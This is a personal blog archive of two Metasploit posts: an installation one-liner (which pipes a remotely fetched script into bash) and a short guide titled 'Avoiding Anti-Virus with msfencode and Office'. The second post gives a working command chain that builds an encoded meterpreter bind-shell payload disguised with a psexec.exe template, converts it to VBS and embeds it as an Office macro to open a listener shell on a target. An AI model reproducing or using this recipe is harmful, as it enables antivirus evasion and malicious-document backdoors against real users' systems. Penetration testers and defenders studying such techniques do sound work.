______ Y ______

My own personal time capsule.

Category Archives: metasploit

Metasploit Installation one-liner

Leave a comment Posted by on August 26, 2016

This one-liner will install msf framework for you:

apt-get install libpq-dev gnupg2 build-essential libreadline-dev libssl-dev libpq5 libpq-dev libreadline5 libsqlite3-dev libpcap-dev openjdk-7-jre git-core  autoconf curl && gpg2 --keyserver hkp://keys.gnupg.net --recv-keys 409B6B1796C275462A1703113804BB82D39DC0E3 && curl -L https://get.rvm.io | bash -s stable && source /usr/local/rvm/scripts/rvm && echo "source /usr/local/rvm/scripts/rvm" >> ~/.bashrc && rvm install 2.1.6 && rvm use 2.1.6 --default && cd /opt && git clone https://github.com/rapid7/metasploit-framework.git && cd /opt/metasploit-framework &&  gem install bundler &&  bundle install

If you using VPS chances are there you don’t have any swap configured (and you need some swap for MSF to work), you can easily set up swap using this command: 

dd if=/dev/zero of=/opt/swapfile1 bs=1024 count=1M && chown root:root /opt/swapfile1 && chmod 0600 /opt/swapfile1 && mkswap /opt/swapfile1 && swapon /opt/swapfile1
metasploit

Avoiding Anti-Virus with msfencode and Office

Leave a comment Posted by on August 25, 2012

Quite simple actually, provided that we know how to use msfencode templates (-x option) to work with the payload. This can be done in few simple steps:

1) Generate payload
2) Pipe it to msfencode with -x option ( use i.e. psexec.exe as template )
3) Use to create vbs script with binary representation of the code
4) Paste the output to the macro in Word, Excel or anything else from Office suite
5) Run “ShellcodeExecute” macro from inside of Office

So in command prompt it looks like:

./msfpayload windows/meterpreter/bind_tcp LPORT=4999 R | msfencode -e x86/shikata_ga_nai -c 8 -x /pentest/windows-binaries/pstools/psexec.exe -t raw > BIND_4999.R && python /pentest/tools/custom/shellcode2vbs.py BIND_4999.R BIND_4999.vbs

And finally copy & paste ‘BIND_4999.vbs’ content into MSWord document as macro. Now upload it to crate a listener shell on the system you got access to.
This can be nicely combined with port forwarding if access to the system is restricted by i.e. firewall or its a DMZ.

anty-virus, api, linux, metasploit, ms, msfencode, python, windows , , , ,